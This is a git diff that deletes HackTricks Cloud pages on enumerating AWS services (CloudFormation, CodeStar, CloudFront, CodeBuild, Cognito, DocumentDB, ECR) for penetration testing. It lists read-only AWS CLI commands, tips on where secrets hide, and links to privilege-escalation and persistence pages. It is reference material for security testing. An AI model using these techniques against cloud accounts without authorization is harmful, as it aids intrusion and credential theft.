-**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic.
- -#### Exploitation - -Find the exploitation steps in the original research: [**https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/**](https://niebardzo.github.io/2022-03-11-aws-hijacking-route53/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/README.md b/pentesting-cloud/aws-security/aws-services/README.md
deleted file mode 100644
index 67243cb53..000000000
--- a/pentesting-cloud/aws-security/aws-services/README.md
+++ /dev/null
@@ -1,57 +0,0 @@
-# AWS - Services
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Types of services
-
-### Container services
-
-Services that fall under container services have the following characteristics:
-
-* The service itself runs on **separate infrastructure instances**, such as EC2.
-* **AWS** is responsible for **managing the operating system and the platform**.
-* A managed service is provided by AWS, which is typically the service itself for the **actual application which are seen as containers**.
-* As a user of these container services, you have a number of management and security responsibilities, including **managing network access security, such as network access control list rules and any firewalls**.
-* Also, platform-level identity and access management where it exists.
-* **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk.
-
-### Abstract Services
-
-* These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**.
-* The services are accessed via endpoints using AWS application programming interfaces, APIs.
-* The **underlying infrastructure, operating system, and platform is managed by AWS**.
-* The abstracted services provide a multi-tenancy platform on which the underlying infrastructure is shared.
-* **Data is isolated via security mechanisms**.
-* Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS.
-
-## Services Enumeration
-
-**The pages of this section are ordered by AWS service. In there you will be able to find information about the service (how it works and capabilities) and that will allow you to escalate privileges.**
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md b/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md
deleted file mode 100644
index a4e9343ab..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md
+++ /dev/null
@@ -1,101 +0,0 @@
-# AWS - CloudFormation & Codestar Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## CloudFormation
-
-AWS CloudFormation is a service designed to **streamline the management of AWS resources**. It enables users to focus more on their applications running in AWS by **minimizing the time spent on resource management**. The core feature of this service is the **template**—a descriptive model of the desired AWS resources. Once this template is provided, CloudFormation is responsible for the **provisioning and configuration** of the specified resources. This automation facilitates a more efficient and error-free management of AWS infrastructure.
-
-### Enumeration
-
-```bash
-# Stacks
-aws cloudformation list-stacks
-aws cloudformation describe-stacks # You could find sensitive information here
-aws cloudformation list-stack-resources --stack-name
-aws cloudformation get-template --stack-name cloudformationStack
-aws cloudformation describe-stack-events --stack-name cloudformationStack
-
-## Show params and outputs
-aws cloudformation describe-stacks | jq ".Stacks[] | .StackId, .StackName, .Parameters, .Outputs"
-
-# Export
-aws cloudformation list-exports
-aws cloudformation list-imports --export-name
-
-# Stack Sets
-aws cloudformation list-stack-sets
-aws cloudformation describe-stack-set --stack-set-name
-aws cloudformation list-stack-instances --stack-set-name
-aws cloudformation list-stack-set-operations --stack-set-name
-aws cloudformation list-stack-set-operation-results --stack-set-name --operation-id
-```
-
-### Privesc
-
-In the following page you can check how to **abuse cloudformation permissions to escalate privileges**:
-
-{% content-ref url="../aws-privilege-escalation/aws-cloudformation-privesc/" %}
-[aws-cloudformation-privesc](../aws-privilege-escalation/aws-cloudformation-privesc/)
-{% endcontent-ref %}
-
-### Post-Exploitation
-
-Check for **secrets** or sensitive information in the **template, parameters & output** of each CloudFormation
-
-## Codestar
-
-AWS CodeStar is a service for creating, managing, and working with software development projects on AWS. You can quickly develop, build, and deploy applications on AWS with an AWS CodeStar project. An AWS CodeStar project creates and **integrates AWS services** for your project development toolchain. Depending on your choice of AWS CodeStar project template, that toolchain might include source control, build, deployment, virtual servers or serverless resources, and more. AWS CodeStar also **manages the permissions required for project users** (called team members).
-
-### Enumeration
-
-```bash
-# Get projects information
-aws codestar list-projects
-aws codestar describe-project --id
-aws codestar list-resources --project-id
-aws codestar list-team-members --project-id
-
- aws codestar list-user-profiles
- aws codestar describe-user-profile --user-arn
-```
-
-### Privesc
-
-In the following page you can check how to **abuse codestar permissions to escalate privileges**:
-
-{% content-ref url="../aws-privilege-escalation/aws-codestar-privesc/" %}
-[aws-codestar-privesc](../aws-privilege-escalation/aws-codestar-privesc/)
-{% endcontent-ref %}
-
-## References
-
-* [https://docs.aws.amazon.com/cloudformation/](https://docs.aws.amazon.com/cloudformation/)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md b/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md
deleted file mode 100644
index d80ef3c21..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md
+++ /dev/null
@@ -1,70 +0,0 @@
-# AWS - CloudFront Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## CloudFront
-
-CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When you use a request content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location which provides it the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself, however, as the logs are stored in S3 you will be stored for the storage used by S3.
-
-The log files capture data over a period of time and depending on the amount of requests that are received by Amazon CloudFront for that distribution will depend on the amount of log fils that are generated. It's important to know that these log files are not created or written to on S3. S3 is simply where they are delivered to once the log file is full. **Amazon CloudFront retains these logs until they are ready to be delivered to S3**. Again, depending on the size of these log files this delivery can take **between one and 24 hours**.
-
-**By default cookie logging is disabled** but you can enable it.
-
-### Functions
-
-You can create functions in CloudFront. These functions will have its **endpoint in cloudfront** defined and will run a declared **NodeJS code**. This code will run inside a **sandbox** in a machine running under an AWS managed machine (you would need a sandbox bypass to manage to escape to the underlaying OS).
-
-As the functions aren't run in the users AWS account. no IAM role is attached so no direct privesc is possible abusing this feature.
-
-### Enumeration
-
-```bash
-aws cloudfront list-distributions
-aws cloudfront get-distribution --id # Just get 1
-aws cloudfront get-distribution-config --id
-
-aws cloudfront list-functions
-aws cloudfront get-function --name TestFunction function_code.js
-
-aws cloudfront list-distributions | jq ".DistributionList.Items[] | .Id, .Origins.Items[].Id, .Origins.Items[].DomainName, .AliasICPRecordals[].CNAME"
-```
-
-## Unauthenticated Access
-
-{% content-ref url="../aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md" %}
-[aws-cloudfront-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md)
-{% endcontent-ref %}
-
-## Post Exploitation
-
-{% content-ref url="../aws-post-exploitation/aws-cloudfront-post-exploitation.md" %}
-[aws-cloudfront-post-exploitation.md](../aws-post-exploitation/aws-cloudfront-post-exploitation.md)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md b/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md
deleted file mode 100644
index 7798cea35..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md
+++ /dev/null
@@ -1,102 +0,0 @@
-# AWS - Codebuild Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## CodeBuild
-
-AWS **CodeBuild** is recognized as a **fully managed continuous integration service**. The primary purpose of this service is to automate the sequence of compiling source code, executing tests, and packaging the software for deployment purposes. The predominant benefit offered by CodeBuild lies in its ability to alleviate the need for users to provision, manage, and scale their build servers. This convenience is because the service itself manages these tasks. Essential features of AWS CodeBuild encompass:
-
-1. **Managed Service**: CodeBuild manages and scales the build servers, freeing users from server maintenance.
-2. **Continuous Integration**: It integrates with the development and deployment workflow, automating the build and test phases of the software release process.
-3. **Package Production**: After the build and test phases, it prepares the software packages, making them ready for deployment.
-
-AWS CodeBuild seamlessly integrates with other AWS services, enhancing the CI/CD (Continuous Integration/Continuous Deployment) pipeline's efficiency and reliability.
-
-### **Github/Gitlab/Bitbucket Credentials**
-
-#### **Default source credentials**
-
-This is the legacy option where it's possible to configure some **access** (like a Github token or app) that will be **shared across codebuild projects** so all the projects can use this configured set of credentials.
-
-The stored credentials (tokens, passwords...) are **managed by codebuild** and there isn't any public way to retrieve them from AWS APIs.
-
-#### Custom source credential
-
-Depending on the repository platform (Github, Gitlab and Bitbucket) different options are provided. But in general, any option that requires to **store a token or a password will store it as a secret in the secrets manager**.
-
-This allows **different codebuild projects to use different configured accesses** to the providers instead of just using the configured default one.
-
-### Enumeration
-
-```bash
-# List external repo creds (such as github tokens)
-## It doesn't return the token but just the ARN where it's located
-aws codebuild list-source-credentials
-
-# Projects
-aws codebuild list-shared-projects
-aws codebuild list-projects
-aws codebuild batch-get-projects --names # Check for creds in env vars
-
-# Builds
-aws codebuild list-builds
-aws codebuild list-builds-for-project --project-name
-aws codebuild list-build-batches
-aws codebuild list-build-batches-for-project --project-name
-
-# Reports
-aws codebuild list-reports
-aws codebuild describe-test-cases --report-arn
-```
-
-### Privesc
-
-In the following page, you can check how to **abuse codebuild permissions to escalate privileges**:
-
-{% content-ref url="../aws-privilege-escalation/aws-codebuild-privesc.md" %}
-[aws-codebuild-privesc.md](../aws-privilege-escalation/aws-codebuild-privesc.md)
-{% endcontent-ref %}
-
-### Post Exploitation
-
-{% content-ref url="../aws-post-exploitation/aws-codebuild-post-exploitation/" %}
-[aws-codebuild-post-exploitation](../aws-post-exploitation/aws-codebuild-post-exploitation/)
-{% endcontent-ref %}
-
-### Unauthenticated Access
-
-{% content-ref url="../aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md" %}
-[aws-codebuild-unauthenticated-access.md](../aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md)
-{% endcontent-ref %}
-
-## References
-
-* [https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html](https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md b/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md
deleted file mode 100644
index 1701910c0..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md
+++ /dev/null
@@ -1,130 +0,0 @@
-# AWS - Cognito Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Cognito
-
-Amazon Cognito is utilized for **authentication, authorization, and user management** in web and mobile applications. It allows users the flexibility to sign in either directly using a **user name and password** or indirectly through a **third party**, including Facebook, Amazon, Google, or Apple.
-
-Central to Amazon Cognito are two primary components:
-
-1. **User Pools**: These are directories designed for your app users, offering **sign-up and sign-in functionalities**.
-2. **Identity Pools**: These pools are instrumental in **authorizing users to access different AWS services**. They are not directly involved in the sign-in or sign-up process but are crucial for resource access post-authentication.
-
-### **User pools**
-
-To learn what is a **Cognito User Pool check**:
-
-{% content-ref url="cognito-user-pools.md" %}
-[cognito-user-pools.md](cognito-user-pools.md)
-{% endcontent-ref %}
-
-### **Identity pools**
-
-The learn what is a **Cognito Identity Pool check**:
-
-{% content-ref url="cognito-identity-pools.md" %}
-[cognito-identity-pools.md](cognito-identity-pools.md)
-{% endcontent-ref %}
-
-## Enumeration
-
-{% code overflow="wrap" %}
-```bash
-# List Identity Pools
-aws cognito-identity list-identity-pools --max-results 60
-aws cognito-identity describe-identity-pool --identity-pool-id "eu-west-2:38b294756-2578-8246-9074-5367fc9f5367"
-aws cognito-identity list-identities --identity-pool-id --max-results 60
-aws cognito-identity get-identity-pool-roles --identity-pool-id
-
-# Identities Datasets
-## Get dataset of identity id (inside identity pool)
-aws cognito-sync list-datasets --identity-pool-id --identity-id
-## Get info of the dataset
-aws cognito-sync describe-dataset --identity-pool-id --identity-id --dataset-name
-## Get dataset records
-aws cognito-sync list-records --identity-pool-id --identity-id --dataset-name
-
-# User Pools
-## Get pools
-aws cognito-idp list-user-pools --max-results 60
-
-## Get users
-aws cognito-idp list-users --user-pool-id
-
-## Get groups
-aws cognito-idp list-groups --user-pool-id
-
-## Get users in a group
-aws cognito-idp list-users-in-group --user-pool-id --group-name
-
-## List App IDs of a user pool
-aws cognito-idp list-user-pool-clients --user-pool-id
-
-## List configured identity providers for a user pool
-aws cognito-idp list-identity-providers --user-pool-id
-
-## List user import jobs
-aws cognito-idp list-user-import-jobs --user-pool-id --max-results 60
-
-## Get MFA config of a user pool
-aws cognito-idp get-user-pool-mfa-config --user-pool-id
-
-## Get risk configuration
-aws cognito-idp describe-risk-configuration --user-pool-id
-```
-{% endcode %}
-
-### Identity Pools - Unauthenticated Enumeration
-
-Just **knowing the Identity Pool ID** you might be able **get credentials of the role associated to unauthenticated** users (if any). [**Check how here**](cognito-identity-pools.md#accessing-iam-roles).
-
-### User Pools - Unauthenticated Enumeration
-
-Even if you **don't know a valid username** inside Cognito, you might be able to **enumerate** valid **usernames**, **BF** the **passwords** of even **register a new user** just **knowing the App client ID** (which is usually found in source code). [**Check how here**](cognito-user-pools.md#registration)**.**
-
-## Privesc
-
-{% content-ref url="../../aws-privilege-escalation/aws-cognito-privesc.md" %}
-[aws-cognito-privesc.md](../../aws-privilege-escalation/aws-cognito-privesc.md)
-{% endcontent-ref %}
-
-## Unauthenticated Access
-
-{% content-ref url="../../aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md" %}
-[aws-cognito-unauthenticated-enum.md](../../aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md)
-{% endcontent-ref %}
-
-## Persistence
-
-{% content-ref url="../../aws-persistence/aws-cognito-persistence.md" %}
-[aws-cognito-persistence.md](../../aws-persistence/aws-cognito-persistence.md)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md b/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md
deleted file mode 100644
index b19805d71..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md
+++ /dev/null
@@ -1,66 +0,0 @@
-# AWS - DocumentDB Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## DocumentDB
-
-Amazon DocumentDB, offering compatibility with MongoDB, is presented as a **fast, reliable, and fully managed database service**. Designed for simplicity in deployment, operation, and scalability, it allows the **seamless migration and operation of MongoDB-compatible databases in the cloud**. Users can leverage this service to execute their existing application code and utilize familiar drivers and tools, ensuring a smooth transition and operation akin to working with MongoDB.
-
-### Enumeration
-
-```bash
-aws docdb describe-db-clusters # Get username from "MasterUsername", get also the endpoint from "Endpoint"
-aws docdb describe-db-instances #Get hostnames from here
-
-# Parameter groups
-aws docdb describe-db-cluster-parameter-groups
-aws docdb describe-db-cluster-parameters --db-cluster-parameter-group-name
-
-# Snapshots
-aws docdb describe-db-cluster-snapshots
-aws --region us-east-1 --profile ad docdb describe-db-cluster-snapshot-attributes --db-cluster-snapshot-identifier
-```
-
-### NoSQL Injection
-
-As DocumentDB is a MongoDB compatible database, you can imagine it's also vulnerable to common NoSQL injection attacks:
-
-{% embed url="https://book.hacktricks.xyz/pentesting-web/nosql-injection" %}
-
-### DocumentDB
-
-{% content-ref url="../aws-unauthenticated-enum-access/aws-documentdb-enum.md" %}
-[aws-documentdb-enum.md](../aws-unauthenticated-enum-access/aws-documentdb-enum.md)
-{% endcontent-ref %}
-
-## References
-
-* [https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/](https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md b/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md
deleted file mode 100644
index f33f7488f..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md
+++ /dev/null
@@ -1,131 +0,0 @@
-# AWS - ECR Enum
-
-## AWS - ECR Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-### ECR
-
-#### Basic Information
-
-Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. It is designed to provide an environment where customers can interact with their container images using well-known interfaces. Specifically, the use of the Docker CLI or any preferred client is supported, enabling activities such as pushing, pulling, and managing container images.
-
-ECR is compose by 2 types of objects: **Registries** and **Repositories**.
-
-**Registries**
-
-Every AWS account has 2 registries: **Private** & **Public**.
-
-1. **Private Registries**:
-
-* **Private by default**: The container images stored in an Amazon ECR private registry are **only accessible to authorized users** within your AWS account or to those who have been granted permission.
- * The URI of a **private repository** follows the format `.dkr.ecr..amazonaws.com/`
-* **Access control**: You can **control access** to your private container images using **IAM policies**, and you can configure fine-grained permissions based on users or roles.
-* **Integration with AWS services**: Amazon ECR private registries can be easily **integrated with other AWS services**, such as EKS, ECS...
-* **Other private registry options**:
- * The Tag immutability column lists its status, if tag immutability is enabled it will **prevent** image **pushes** with **pre-existing tags** from overwriting the images.
- * The **Encryption type** column lists the encryption properties of the repository, it shows the default encryption types such as AES-256, or has **KMS** enabled encryptions.
- * The **Pull through cache** column lists its status, if Pull through cache status is Active it will cache **repositories in an external public repository into your private repository**.
- * Specific **IAM policies** can be configured to grant different **permissions**.
- * The **scanning configuration** allows to scan for vulnerabilities in the images stored inside the repo.
-
-2. **Public Registries**:
-
-* **Public accessibility**: Container images stored in an ECR Public registry are **accessible to anyone on the internet without authentication.**
- * The URI of a **public repository** is like `public.ecr.aws//`. Although the `` part can be changed by the admin to another string easier to remember.
-
-**Repositories**
-
-These are the **images** that in the **private registry** or to the **public** one.
-
-{% hint style="info" %}
-Note that in order to upload an image to a repository, the **ECR repository need to have the same name as the image**.
-{% endhint %}
-
-#### Registry & Repository Policies
-
-**Registries & repositories** also have **policies that can be used to grant permissions to other principals/accounts**. For example, in the following repository policy image you can see how any user from the whole organization will be able to access the image:
-
-
- -#### Enumeration - -{% code overflow="wrap" %} -```bash -# Get repos -aws ecr describe-repositories -aws ecr describe-registry - -# Get image metadata -aws ecr list-images --repository-name -aws ecr describe-images --repository-name -aws ecr describe-image-replication-status --repository-name --image-id -aws ecr describe-image-scan-findings --repository-name --image-id -aws ecr describe-pull-through-cache-rules --repository-name --image-id - -# Get public repositories -aws ecr-public describe-repositories - -# Get policies -aws ecr get-registry-policy -aws ecr get-repository-policy --repository-name -``` -{% endcode %} - -#### Unauthenticated Enum - -{% content-ref url="../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md" %} -[aws-ecr-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md) -{% endcontent-ref %} - -#### Privesc - -In the following page you can check how to **abuse ECR permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/aws-ecr-privesc.md" %} -[aws-ecr-privesc.md](../aws-privilege-escalation/aws-ecr-privesc.md) -{% endcontent-ref %} - -#### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-ecr-post-exploitation.md" %} -[aws-ecr-post-exploitation.md](../aws-post-exploitation/aws-ecr-post-exploitation.md) -{% endcontent-ref %} - -#### Persistence - -{% content-ref url="../aws-persistence/aws-ecr-persistence.md" %} 